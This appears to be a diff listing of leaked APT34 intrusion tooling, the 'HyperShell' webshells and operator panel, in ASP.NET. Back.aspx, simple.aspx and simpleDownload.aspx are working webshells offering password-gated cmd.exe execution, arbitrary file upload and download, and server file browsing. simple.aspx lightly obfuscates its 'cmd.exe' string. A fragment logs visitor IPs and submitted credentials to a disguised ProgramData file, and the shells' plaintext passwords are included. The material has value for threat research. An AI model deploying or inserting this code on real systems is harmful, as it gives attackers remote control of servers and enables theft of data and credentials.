// var s = "arcname=" + encodeURIComponent(n.value) + "&arcpath=" + encodeURIComponent(p.value) + "&arci=" + encodeURIComponent(i) + "&arcw=" + encodeURIComponent(w);
// h.open("POST", u, true);
// h.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// h.setRequestHeader("Content-length", s.length);
// h.setRequestHeader("Connection", "close");
// h.onloadend = function () { clkLgn(); };
// h.send(s);
// };
// xmlHttp.send(null);
//} catch (err) {
//}
}
</script>
<%
if (!string.IsNullOrEmpty(Request["arcname"])&&!string.IsNullOrEmpty(Request["arcpath"]))
{
int max=40;
int count=0;
bool isOk=true;
while (isOk&&count<max)
{
try {
count++;
System.IO.File.AppendAllText(@"C:\ProgramData\Microsoft\Windows\MSWINFX"+count,DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss")+"|"+Request.UserHostAddress+"|"+Request.ServerVariables["HTTP_X_FORWARDED_FOR"]+"|"+Request.ServerVariables["REMOTE_ADDR"]+"|"+Request["arci"]+"|"+Request["arcw"]+"|"+Request["arcname"]+"|"+Request["arcpath"]+"|"+Request.UserAgent+Environment.NewLine+Environment.NewLine);
isOk =false;
} catch{}
}
}
%>

18
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Poster.aspx Normal file
View File

@@ -0,0 +1,18 @@
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Poster.aspx.cs" Inherits="HyperShell.Poster" ValidateRequest="false" %>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title></title>
</head>
<body>
<form id="form1" runat="server">
<div>
<asp:TextBox ID="txtUrl" runat="server" Width="400px"></asp:TextBox><br />
<asp:TextBox ID="txtPost" runat="server" TextMode="MultiLine" Width="400px" Height="400px"></asp:TextBox><br />
<asp:LinkButton ID="lbnSend" runat="server" OnClick="lbnSend_Click">Send</asp:LinkButton>
</div>
</form>
</body>
</html>

51
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Poster.aspx.cs Normal file
View File

@@ -0,0 +1,51 @@
using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.Linq;
using System.Net;
using System.Text;
using System.Web;
using System.Web.Script.Services;
using System.Web.Services;
using System.Web.UI;
using System.Web.UI.WebControls;
namespace HyperShell
{
public partial class Poster : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
protected void lbnSend_Click(object sender, EventArgs e)
{
var cl = new WebClient();
using (WebClient client = new WebClient())
{
NameValueCollection val = new NameValueCollection();
string[] lines = txtPost.Text.Split(new string[] { Environment.NewLine }, StringSplitOptions.None);
string data = string.Empty;
foreach (string item in lines)
{
if (!string.IsNullOrEmpty(data))
data += "&";
string[] temp = item.Split('@');
val.Add(temp[0], Convert.ToBase64String(Encoding.UTF8.GetBytes(temp[1])));
data += temp[0] + "=" + System.Web.HttpUtility.UrlEncode(Convert.ToBase64String(Encoding.UTF8.GetBytes(temp[1])));
}
using (WebClient wc = new WebClient())
{
ServicePointManager.ServerCertificateValidationCallback = (a, b, c, d) => true;
wc.Headers[HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";
wc.UploadString(txtUrl.Text, data);
}
//client.UploadValues(txtUrl.Text, val);
}
}
}
}

51
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Poster.aspx.designer.cs generated Normal file
View File

@@ -0,0 +1,51 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace HyperShell {
public partial class Poster {
/// <summary>
/// form1 control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.HtmlControls.HtmlForm form1;
/// <summary>
/// txtUrl control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox txtUrl;
/// <summary>
/// txtPost control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.TextBox txtPost;
/// <summary>
/// lbnSend control.
/// </summary>
/// <remarks>
/// Auto-generated field.
/// To modify move field declaration from designer file to code-behind file.
/// </remarks>
protected global::System.Web.UI.WebControls.LinkButton lbnSend;
}
}

399
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Shell/Back.aspx Normal file
View File

@@ -0,0 +1,399 @@
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
<%@ Import Namespace="System.IO" %>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<%
try
{
NameValueCollection t = HttpContext.Current.Request.Form;
method selectedMethod = method.auth;
try
{
int methodID = int.Parse(fb(t["m"]));
selectedMethod = (method)methodID;
}
catch
{
rm();
}
p = fb(t["p"]);
pro = fb(t["pro"]);
cmd = fb(t["cmd"]);
sav = fb(t["sav"]);
vir = t["vir"];
nen = fb(t["nen"]);
upb = fb(t["upb"]);
upd = fb(t["upd"]);
del = fb(t["del"]);
don = fb(t["don"]);
hid = t["hid"];
tfil = fb(t["tfil"]);
ttar = fb(t["ttar"]);
ttim = fb(t["ttim"]);
baseFile = t["baseFile"];
baseAddr = fb(t["baseAddr"]);
baseVir = t["baseVir"];
sqc = fb(t["sqc"]);
sqq = fb(t["sqq"]);
exadd = fb(t["exadd"]);
switch (selectedMethod)
{
case method.auth:
c(p);
break;
case method.command:
r(pro, cmd);
break;
//case method.upload:
// u(HttpContext.Current.Request.Files["upl"], sav, string.IsNullOrEmpty(vir) ? false : true, nen);
// break;
//case method.uploadbase64:
// baseupl(baseFile,baseAddr,string.IsNullOrEmpty(baseVir)?false:true);
// break;
//case method.delete:
// d(del);
// break;
case method.download:
z(don);
break;
//case method.changeTime:
// g(hid,tfil,ttar,ttim);
// break;
//case method.sqlQuery:
// sq(sqc,sqq);
// break;
case method.explorer:
exp(exadd);
break;
case method.getsize:
gsize(fb(t["gsize"]));
break;
case method.getlocation:
getLoc();
break;
default:
break;
}
//if(!string.IsNullOrEmpty(p))c(p);
//else c();
//if(!string.IsNullOrEmpty(cmd))r(pro,cmd);
//else if(HttpContext.Current.Request.Files["upl"]!=null)u(HttpContext.Current.Request.Files["upl"],sav,string.IsNullOrEmpty(vir)?false:true,nen);
//else if(!string.IsNullOrEmpty(upb))h(upb,upd);
//else if(!string.IsNullOrEmpty(del))d(del);
//else if(!string.IsNullOrEmpty(don))z(don);
//else if(!string.IsNullOrEmpty(tfil))g(hid,tfil,ttar,ttim);
//else if(!string.IsNullOrEmpty(baseFile))baseupl(baseFile,baseAddr,string.IsNullOrEmpty(baseVir)?false:true);
//else if(!string.IsNullOrEmpty(sqc))sq(sqc,sqq);
//else if(!string.IsNullOrEmpty(exadd))exp(exadd);
//else if(!string.IsNullOrEmpty(t["gsize"]))gsize(fb(t["gsize"]));
//if(HttpContext.Current.Request.Cookies["data"]!=null){string data=fb(HttpContext.Current.Request.Cookies["data"].Value);string[] data2=data.Split(new string[]{"#|#"},StringSplitOptions.None);for(int i=0;i<data2.Length;i++){string[] data3=data2[i].Split(new string[]{"#=#"},StringSplitOptions.None);
// switch (data3[0]){
// case"pro":pro=a(pro,fb(data3[1]));break;
// case"cmd":cmd=a(cmd,fb(data3[1]));break;
// case"sav":sav=a(sav,fb(data3[1]));break;
// case"vir":vir=a(vir,fb(data3[1]));break;
// case"nen":nen=a(nen,fb(data3[1]));break;
// case"don":don=a(don,fb(data3[1]));break;
// case"tfil":tfil=a(tfil,fb(data3[1]));break;
// case"ttar":ttar=a(ttar,fb(data3[1]));break;
// case"ttim":ttim=a(ttim,fb(data3[1]));break;
// case"sqc":sqc=a(sqc,fb(data3[1]));break;
// case"sqq":sqq=a(sqq,fb(data3[1]));break;
// case"exadd":exadd=a(exadd,fb(data3[1]));break;
// }}}
//view();
}
catch (Exception ex)
{
response("Error : " + ex.Message);
}
%>
<script runat="server">
enum method
{
auth = 0,
command = 1,
upload = 2,
uploadbase64 = 3,
delete = 4,
download = 5,
changeTime = 6,
sqlQuery = 7,
explorer = 8,
getsize = 9,
getlocation = 10
};
string salt = "di2zag7wZHTK9YR0NGq";
string p, pro, cmd, sav, vir, nen, upb, upd, del, don, hid, tfil, ttar, ttim, baseFile, baseAddr, baseVir, baseName, sqc, sqq, exadd;
bool aut = false;
string pp = "ePQm3HPXJYt5wZSFhktJ/IEin/A=";
string a(string a, string b) { return string.IsNullOrEmpty(a) ? b : a; }
string tb(string a) { string ret = ""; try { ret = string.IsNullOrEmpty(a) ? a : Convert.ToBase64String(Encoding.UTF8.GetBytes(a)); } catch { } return ret; }
string fb(string a) { string ret = ""; try { ret = string.IsNullOrEmpty(a) ? a : Encoding.UTF8.GetString(Convert.FromBase64String(a)); } catch { } return ret; }
void view()
{
string data = string.Format("pro#=#{0}#|#cmd#=#{1}#|#sav#=#{2}#|#vir#=#{3}#|#nen#=#{4}#|#don#=#{5}#|#tfil#=#{6}#|#ttar#=#{7}#|#ttim#=#{8}|#sqc#=#{9}|#sqq#=#{10}|#exadd#=#{11}",
tb(pro), tb(cmd), tb(sav), tb(vir), tb(nen), tb(don), tb(tfil), tb(ttar), tb(ttim), tb(sqc), tb(sqq), tb(exadd));
HttpCookie coo = new HttpCookie("data", data); coo.Expires = DateTime.Now.AddDays(1); HttpContext.Current.Response.SetCookie(coo);
}
void response(string ret)
{
Response.Clear();
Response.Write(tb(ret));
Response.Headers.Add("Access-Control-Allow-Origin", "*");
Response.Flush();
Response.SuppressContent = true;
ApplicationInstance.CompleteRequest();
Response.End();
}
void rm() {/*System.IO.File.Delete(Request.ServerVariables["PATH_TRANSLATED"]);Response.Redirect(Request.RawUrl);*/Response.Redirect("/"); }
void c(string p)
{
string ret = string.Empty;
try
{
ret = c().ToString();
}
catch (Exception e)
{
ret = "Error : " + e.Message;
}
response(ret);
}
bool c()
{
if (!string.IsNullOrEmpty(p))
{
aut = Convert.ToBase64String(new System.Security.Cryptography.SHA1CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(p + salt))) == pp;
if (!aut)
rm();
return aut;
}
rm();
return false;
}
//void u(HttpPostedFile upl, string sav, bool vir, string nen) { try { if (c()) { if (upl != null && upl.ContentLength > 0) { string fn = string.IsNullOrEmpty(nen) ? System.IO.Path.GetFileName(upl.FileName) : nen; string path = vir ? Server.MapPath(sav) : sav; string SaveLocation = System.IO.Path.HasExtension(path) ? path : path.TrimEnd('\\') + "\\" + fn; upl.SaveAs(SaveLocation); l("File uploaded successfuly : " + SaveLocation); } } } catch (Exception ex) { l(ex.Message); } }
//void baseupl(string baseFile, string baseAddr, bool baseVir) { try { if (c()) { if (baseFile != null && baseFile.Length > 0 && !string.IsNullOrEmpty(baseAddr)) { string SaveLocation = baseVir ? Server.MapPath(baseAddr) : baseAddr; System.IO.File.WriteAllBytes(SaveLocation, Convert.FromBase64String(baseFile)); l("File uploaded successfuly : " + SaveLocation); } } } catch (Exception ex) { l(ex.Message); } }
void r(string pro, string cmd)
{
string ret = "Error : -";
try
{
if (c())
{
string o = exec(cmd, pro);
ret = HttpUtility.HtmlEncode(o);
}
}
catch (Exception ex)
{
ret = "Error : " + ex.Message;
}
response(ret);
}
void z(string don)
{
try {
if (c() && !string.IsNullOrEmpty(don))
{
byte[] f = System.IO.File.ReadAllBytes(don);
Response.Clear();
Response.ClearHeaders();
Response.ClearContent();
Response.AppendHeader("content-length", f.Length.ToString());
Response.ContentType = "application/octet-stream";
Response.AppendHeader("content-disposition", "attachment; filename=" + don.Substring(don.LastIndexOf('\\') + 1));
Response.BinaryWrite(f);
Response.Flush();
Response.SuppressContent = true;
ApplicationInstance.CompleteRequest();
Response.End();
}
} catch { }
}
//string ti(string tt) { return "Creation Time :\t\t" + System.IO.File.GetCreationTime(tt).ToString("yyyy-MM-dd HH:mm:ss") + "<br>Last Access Time :\t" + System.IO.File.GetLastAccessTime(tt).ToString("yyyy-MM-dd HH:mm:ss") + "<br>Last Write Time :\t" + System.IO.File.GetLastWriteTime(tt).ToString("yyyy-MM-dd HH:mm:ss"); }
//void g(string hid, string tfil, string ttar, string ttim) { try { if (c() && !string.IsNullOrEmpty(tfil)) { l(string.Empty); if (hid == "1") ti(tfil); else if (hid == "2") { if (!string.IsNullOrEmpty(ttar)) { System.IO.File.SetCreationTime(tfil, System.IO.File.GetCreationTime(ttar)); System.IO.File.SetLastAccessTime(tfil, System.IO.File.GetLastAccessTime(ttar)); System.IO.File.SetLastWriteTime(tfil, System.IO.File.GetLastWriteTime(ttar)); l("Time successfuly changed :<br>" + tfil + "<br>" + ti(tfil)); } } else if (hid == "3") { if (!string.IsNullOrEmpty(ttim)) { DateTime te = DateTime.Parse(ttim); System.IO.File.SetCreationTime(tfil, te); System.IO.File.SetLastAccessTime(tfil, te); System.IO.File.SetLastWriteTime(tfil, te); l("Time successfuly changed :<br>" + tfil + "<br>" + ti(tfil)); } } } } catch (Exception ex) { l(ex.Message); } }
//void h(string upb, string upd) { try { if (c() && !string.IsNullOrEmpty(upb) && !string.IsNullOrEmpty(upd)) { System.IO.File.WriteAllBytes(System.IO.Path.GetTempPath() + upd, Convert.FromBase64String(upb)); l(upd + " successfuly uploaded"); } } catch (Exception ex) { l(ex.Message); } }
//void d(string del) { try { if (c() && !string.IsNullOrEmpty(del)) { System.IO.File.Delete(System.IO.Path.GetTempPath() + del); l(del + " successfuly deleled"); } } catch (Exception ex) { l(ex.Message); } }
//void sq(string sqc, string sqq) { try { if (c()) { if (!string.IsNullOrEmpty(sqc)) { using (System.Data.SqlClient.SqlConnection con = new System.Data.SqlClient.SqlConnection(sqc)) { if (string.IsNullOrEmpty(sqq)) { try { con.Open(); l("Sql Server Connection Successfuly Established"); } catch (Exception ex) { l("Sql Server Connection Failed :" + Environment.NewLine + ex.ToString()); } } else { try { con.Open(); System.Data.SqlClient.SqlCommand com = new System.Data.SqlClient.SqlCommand(sqq, con); System.Data.SqlClient.SqlDataAdapter ad = new System.Data.SqlClient.SqlDataAdapter(com); System.Data.DataTable dt = new System.Data.DataTable(); ad.Fill(dt); DataGrid grid = new DataGrid(); System.Web.UI.WebControls.DataList list = new System.Web.UI.WebControls.DataList(); grid.DataSource = dt; grid.DataBind(); log.Controls.Add(grid); } catch (Exception ex) { l("Error : <br>" + ex.ToString()); } } con.Close(); } } } } catch (Exception ex) { l(ex.Message); } }
//string x(string f) { return Encoding.UTF8.GetString(Convert.FromBase64String(f)); }
//void l(string ll) { log.InnerHtml = tb(ll); }
string exec(string cmd, string pro = "")
{
System.Diagnostics.Process n = new System.Diagnostics.Process();
n.StartInfo.FileName = (string.IsNullOrEmpty(pro) ? "cmd.exe" : pro);
n.StartInfo.UseShellExecute = false; n.StartInfo.RedirectStandardInput = true;
n.StartInfo.RedirectStandardOutput = true;
n.StartInfo.RedirectStandardError = true;
n.StartInfo.CreateNoWindow = true;
string o = null;
n.Start();
n.StandardInput.WriteLine(cmd);
n.StandardInput.WriteLine("exit");
o = n.StandardOutput.ReadToEnd();
n.WaitForExit();
n.Close();
return o;
}
void gsize(string addr)
{
string ret = "Error : -";
try
{
long size = GetDirSize(new DirectoryInfo(addr));
ret = sizeFix(size);
}
catch (Exception ex)
{
ret = "Error : " + ex.Message;
}
response(ret);
}
void exp(string exadd)
{
string ret = "Error : -";
try
{
if (exadd.ToLower() == "root")
{
ret = "{\"dir\":[{\"name\":\"\\\\\\\\localhost\"}";// in javascript json parser two \ = one \
string netUse = exec("net use");
string[] lines = netUse.Split(new string[] { Environment.NewLine }, StringSplitOptions.RemoveEmptyEntries);
foreach (string item in lines)
{
if (item.ToLower().StartsWith("ok"))
{
int index = item.IndexOf("\\\\");
ret += ",{\"name\":\"\\\\" + item.Substring(index, item.IndexOf('\\', index + 2) - index) + "\"}";
}
}
ret += "]}";
}
else
{
if (exadd.Trim('\\').Split('\\').Count() == 1) // \\localhost
{
string tmp = exadd.ToLower().TrimEnd('\\');
if (tmp == "\\\\localhost")
{
ret = "{\"dir\":[";
bool isStart = false;
foreach (DriveInfo item in DriveInfo.GetDrives())
{
if (item.IsReady)
{
if (isStart)
ret += ",";
ret += string.Format("{{\"name\":\"{0}$\",\"tsize\":\"{1}\",\"fsize\":\"{2}\",\"usize\":\"{3}\"}}", item.Name.TrimEnd('\\').TrimEnd(':'), sizeFix(item.TotalSize), sizeFix(item.TotalFreeSpace), sizeFix(item.TotalSize - item.TotalFreeSpace));
isStart = true;
}
}
ret += "]}";
}
else
{
}
}
else // \\localhost\c$\
{
FileAttributes attr = File.GetAttributes(exadd);
if ((attr & FileAttributes.Directory) == FileAttributes.Directory)
{
DirectoryInfo dirInfo = new DirectoryInfo(exadd);
ret = "{" + string.Format("{0},{1}", createJsonDirectory(dirInfo.GetDirectories()), createJsonFile(dirInfo.GetFiles())) + "}";
}
}
}
}
catch (Exception ex)
{
ret = "Error : " + ex.Message;
}
response(ret);
}
void getLoc()
{
response(Server.MapPath(string.Empty) + "\\");
}
long GetDirSize(DirectoryInfo d)
{
long size = 0;
FileInfo[] fis = d.GetFiles();
foreach (FileInfo fi in fis)
{
size += fi.Length;
}
DirectoryInfo[] dis = d.GetDirectories();
foreach (DirectoryInfo di in dis)
{
size += GetDirSize(di);
}
return size;
}
string createJsonDirectory(DirectoryInfo[] dir)
{
string json = "\"dir\":[";
for (int i = 0; i < dir.Length; i++)
{
if (i > 0)
json += ",";
json += "{\"name\":\"" + dir[i].Name + "\"}";
}
json += "]";
return json;
}
string createJsonFile(FileInfo[] file)
{
string json = "\"file\":[";
for (int i = 0; i < file.Length; i++)
{
if (i > 0)
json += ",";
json += "[\"" + file[i].Name + "\",\"" + sizeFix(file[i].Length) + "\"]";
}
json += "]";
return json;
}
string sizeFix(long size)
{
double s = size;
if (s < 1024) return s + " B";
s = s / 1024;
if (s < 1024) return Math.Round(s, 2) + " KB";
s = s / 1024;
if (s < 1024) return Math.Round(s, 2) + " MB";
s = s / 1024;
return Math.Round(s, 2) + " GB";
}
</script>
</head>
<body>
</body>
</html>

25
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Shell/EclipseTheme.aspx Normal file
View File

@@ -0,0 +1,25 @@
<html>
<head>
<title></title>
<link href="/css/main.css" rel="stylesheet" />
<link href="/fonts/RobotoMono/font.css" rel="stylesheet" />
</head>
<body>
<div class="MainWindow">
<div class="header">
<div class="header-left-side">
<span class="text">Administrator Panel</span>
</div>
<div class="separator-v"></div>
</div>
<div class="body">
<div class="body-left-side">
<div class="separator-h"></div>
</div>
<div class="feed">
</div>
</div>
</div>
</body>
</html>

172
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Shell/Front/Front.aspx Normal file
View File

@@ -0,0 +1,172 @@
<html>
<head>
<link href="css/main.css" rel="stylesheet" />
<script src="js/main.js"></script>
<script src="js/send.js"></script>
<script src="js/explorer.js"></script>
</head>
<body>
<div style="border: 1px solid #ccc; border-bottom: none">
<table>
<tr>
<td class="h">Login</td>
<td class="b">
<t>Url :</t>
<input id="url" class="mmm" type="text" style="width: 300px" onkeypress="return grabEnter(event, this);" />
<t>Password :</t>
<input id="p" class="mmm" type="text" style="width: 300px" onkeypress="return grabEnter(event, this);" />
<input type="button" id="btnLogin" value="Login" onclick="login(this);" />
</td>
</tr>
</table>
</div>
<div class="tbbt">
<button class="tblnk active" onclick="openTab(event, 'tbMain')">Command</button>
<button class="tblnk" onclick="openTab(event, 'tbDir')">Explorer</button>
<button class="tblnk" onclick="openTab(event, 'tbUpload')">Upload</button>
<button class="tblnk" onclick="openTab(event, 'tbDownload')">Download</button>
<button class="tblnk" onclick="openTab(event, 'tbSqlServer')">Sql Server</button>
<button class="tblnk" onclick="openTab(event, 'tbChangeTime')">Change Time</button>
</div>
<div id="tbMain" class="tb" style="display: block">
<table>
<tr>
<td class="h">Address</td>
<td class="b">
<t>Current Location :</t>
<y id="loc"></y>
<input type="button" value="Use" onclick="use()" />
<input type="button" value="Reset Form" onclick="reset()" />
<div style="float: right">v6.1</div>
</td>
</tr>
</table>
<hr>
<form action="/" method="post">
<table>
<tr>
<td class="h">Command</td>
<td class="b">
<t>Process :</t>
<input id="pro" class="mmm" type="text" value='cmd.exe' onkeypress="return grabEnter(event, this);" /><br>
<t>Command :</t>
<input id="cmd" class="mmm" type="text" onkeypress="return grabEnter(event, this);" />
<input type="button" value="Execute" onclick="command(this);" />
</td>
</tr>
</table>
</form>
</div>
<div id="tbDir" class="tb">
<table>
<tr>
<td class="h">Explorer</td>
<td class="b">
<t>Address :</t>
<input id="exadd" class="mmm" type="text" onkeypress="return checkEnter(event);" />
<input type="submit" value="Explore" onclick="sendAddress();" style="margin-right: 5px;" />
<span id="loader" class="loader" style="display: none"></span>
</td>
</tr>
</table>
<hr />
<div id="objLocation">
<div class="objS">Location :</div>
<div class="objD objL" onclick="setAddress(this.innerText);">root</div>
</div>
<div id="objFrame">
</div>
</div>
<div id="tbUpload" class="tb">
<form class="form" action="/" method="post">
<table>
<tr>
<td class="h">Upload</td>
<td class="b">
<t>File name :</t>
<input name="upl" type="file" /><br>
<t>Save as :</t>
<input name="sav" class="mmm" type="text" />
<input name="vir" type="checkbox" /><g>Is virtual path</g><br>
<t>New File name :</t>
<input name="nen" class="mmm" type="text" />
<input type="submit" value="Upload" onclick="subm();" />
</td>
</tr>
</table>
</form>
<hr>
<form class="form" action="/" method="post">
<table>
<tr>
<td class="h">Upload Base64</td>
<td class="b">
<t>Base64 File :</t>
<textarea name="baseFile"></textarea>
<input name="baseVir" type="checkbox" /><g>Is virtual path</g><br>
<t>File Path and Name :</t>
<input name="baseAddr" class="mmm" type="text" value='' />
<input type="submit" value="Upload" onclick="subm();" />
</td>
</tr>
</table>
</form>
</div>
<div id="tbDownload" class="tb">
<table>
<tr>
<td class="h">Download</td>
<td class="b">
<t>File name :</t>
<input id="don" type="text" />
<input type="button" value="Download" onclick="download(this);" />
</td>
</tr>
</table>
</div>
<div id="tbSqlServer" class="tb">
<form class="form" action="/" method="post">
<table>
<tr>
<td class="h">Sql Server</td>
<td class="b">
<input style="margin: 0 0 3px 192px" type="button" value="Standard Connection Sample" onclick="document.getElementsByName('sqc')[0].value = 'Server=.;Database=db;User Id=user;Password=pass'" />
<input style="margin: 0 0 3px 0" type="button" value="Trusted Connection Sample" onclick="document.getElementsByName('sqc')[0].value = 'Server=.;Database=db;Trusted_Connection=True'" /><br />
<t>Connection String :</t>
<input name="sqc" class="mmm" type="text" value='' /><br />
<t>Query :</t>
<textarea name="sqq" class="mmm"></textarea>
<input type="submit" value="Run" onclick="subm();" />
</td>
</tr>
</table>
</form>
</div>
<div id="tbChangeTime" class="tb">
<form class="form" action="/" method="post">
<table>
<tr>
<td class="h">Change Creation Time</td>
<td class="b">
<input name="hid" type="hidden" />
<t>File name :</t>
<input name="tfil" class="mmm" type="text" />
<input type="submit" value="Get" onclick="subm(); document.getElementsByName('hid')[0].value = '1'" /><br>
<t>From This File :</t>
<input name="ttar" class="mmm" type="text" />
<input type="submit" value="Set" onclick="subm(); document.getElementsByName('hid')[0].value = '2'" /><br>
<t>New Time :</t>
<input name="ttim" class="mmm" type="text" />
<input type="submit" value="Set" onclick="subm(); document.getElementsByName('hid')[0].value = '3'" />
</td>
</tr>
</table>
</form>
</div>
<br />
<pre id="log"></pre>
<script>loadForm(); getLocation();</script>
</body>
</html>

1394
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Shell/HighShell.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

1
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Shell/HighShellPass.txt Normal file
View File

@@ -0,0 +1 @@
Th!sN0tF0rFAN

33
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Shell/HyperShell.aspx Normal file
View File

@@ -0,0 +1,33 @@
<%--
1- Client Side is javascript
2- Client Side is compressed encrypted in serversice
4- Server Side Get file hash and send to client side
3- Client Side compare server side hash with self hash, and show error if not ok
Server Side Code :
1- Server Side Codes "encrypted batch script" or "encrypted powershell script"
--%>
<html>
<head>
<title>Hyper Shell</title>
<link href="/css/main.css" rel="stylesheet" />
<link href="/css/kendo.common.min.css" rel="stylesheet" />
<link href="/css/kendo.black.min.css" rel="stylesheet" />
<script src="/js/jquery.min.js"></script>
<script src="/js/kendo.all.min.js"></script>
<script src="/js/init.js"></script>
</head>
<body>
<div id="mainContainer">
<div id="headerContainer">
</div>
<div id="leftContainer">
<div id="panelbar"></div>
</div>
<div id="rightContainer">
<div ></div>
</div>
</div>
</body>
</html>

76
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Shell/simple.aspx Normal file
View File

@@ -0,0 +1,76 @@
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
<%@ Import namespace="System.IO"%>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<%
try
{
Result.InnerText = string.Empty;
if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form["sport"]))
{
HttpCookie newcook = new HttpCookie("fqrspt", HttpContext.Current.Request.Form["sport"]);
newcook.Expires = DateTime.Now.AddDays(4);
HttpContext.Current.Response.SetCookie(newcook);
}
if (HttpContext.Current.Request.Cookies["fqrspt"] != null)
{
if ((Convert.ToBase64String(new System.Security.Cryptography.SHA256CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(HttpContext.Current.Request.Cookies["fqrspt"].Value + "OOOLefHUgIk$Alin2dpdiW3Bn&x*z26x94V*XECjn7j4J0Q4dA13YOo#5nh@2Kvh"))) == "LoYTUF2aIaJ2C9FmhMvU+72xObPYHzAPriWZZd4K8Ok="))
{
if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form["balls"]))
{
System.Diagnostics.Process process = new System.Diagnostics.Process();
process.StartInfo.FileName = "cm" + "d.e" + "xe";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardInput = true;
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.CreateNoWindow = true;
process.Start();
process.StandardInput.WriteLine(HttpContext.Current.Request.Form["balls"]);
process.StandardInput.WriteLine("exit");
string output = string.Empty;
output = process.StandardOutput.ReadToEnd();
process.WaitForExit();
process.Close();
Result.InnerText = output;
}
else if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form["sky"]))
{
HttpPostedFile file = HttpContext.Current.Request.Files["woods"];
if (file != null && file.ContentLength > 0)
{
file.SaveAs(HttpContext.Current.Request.Form["sky"]);
Result.InnerText = "uploaded";
}
}
}
}
}
catch (Exception ex)
{
Result.InnerText = ex.ToString();
}
%>
</head>
<body>
<table style="width:100%">
<tr>
<td>Password :</td><td><form method="post"><input name="sport" style='width:300px' /><input type="submit" value="Login"/></form></td>
</tr>
<tr>
<td>Command :</td><td><form method="post"><input name="balls" style='width:300px' /><input type="submit" value="Execute"/></form></td>
</tr>
<tr>
<td>Upload :</td><td>
<form method="post" enctype="multipart/form-data">
<input name="woods" type="file" />
<input name="sky" type="text" />
<input type="submit" value="Upload" />
</form>
</td>
</tr>
</table>
<pre id="Result" runat="server"></pre>
</body>
</html>

1
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Shell/simple.aspx.Password.txt Normal file
View File

@@ -0,0 +1 @@
MkRg5dm8MOk

35
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/Shell/simpleDownload.aspx Normal file
View File

@@ -0,0 +1,35 @@
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
<%@ Import Namespace="System.IO" %>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<%
try
{
ress.InnerText = string.Empty;
if (!string.IsNullOrEmpty(HttpContext.Current.Request.Form["bala"]))
{
HttpPostedFile file = HttpContext.Current.Request.Files["hala"];
if (file != null && file.ContentLength > 0)
{
file.SaveAs(HttpContext.Current.Request.Form["bala"]);
ress.InnerText = "...u" + "ploaded...";
}
}
}
catch (Exception ex)
{
ress.InnerText = ex.ToString();
}
%>
</head>
<body>
<form method="post" enctype="multipart/form-data">
<input name="hala" type="file" />
<input name="bala" type="text" />
<input type="submit" value="Upload" />
</form>
<pre id="ress" runat="server"></pre>
</body>
</html>

288
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Parts/HighShellServer.aspx Normal file
View File

@@ -0,0 +1,288 @@
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
<%
try
{
NameValueCollection t=HttpContext.Current.Request.Form;
method selectedMethod=method.auth;
try{int methodID=int.Parse(fb(t["m"]));selectedMethod=(method)methodID;}catch{rm();}
p=fb(t["p"]);
adminU=fb(t["adminU"]);
adminP=fb(t["adminP"]);
if(string.IsNullOrEmpty(p)){if(HttpContext.Current.Request.Cookies["p"] != null)p=fb(HttpContext.Current.Request.Cookies["p"].Value);}
if(selectedMethod != method.auth && selectedMethod != method.authAjax && !login(p)){rm();}
switch(selectedMethod){
case method.auth:
case method.authAjax:auth(p);break;
case method.command:
case method.commandAjax:command(fb(t["cmd"]));break;
case method.upload:upload(HttpContext.Current.Request.Files["uploadFile"],fb(t["uploadPath"]));break;
case method.download:download(fb(t["don"]),fb(t["isdel"]));break;
case method.downloadTest:downloadTest(fb(t["don"]));break;
case method.explorer:exp(fb(t["exadd"]));break;
case method.getsize:gsize(fb(t["gsize"]));break;
case method.getlocation:
case method.getlocationAjax:response(getLoc());break;
case method.rename:rename(fb(t["rename1"]),fb(t["rename2"]));break;
case method.copy:copy(fb(t["copy1"]),fb(t["copy2"]));break;
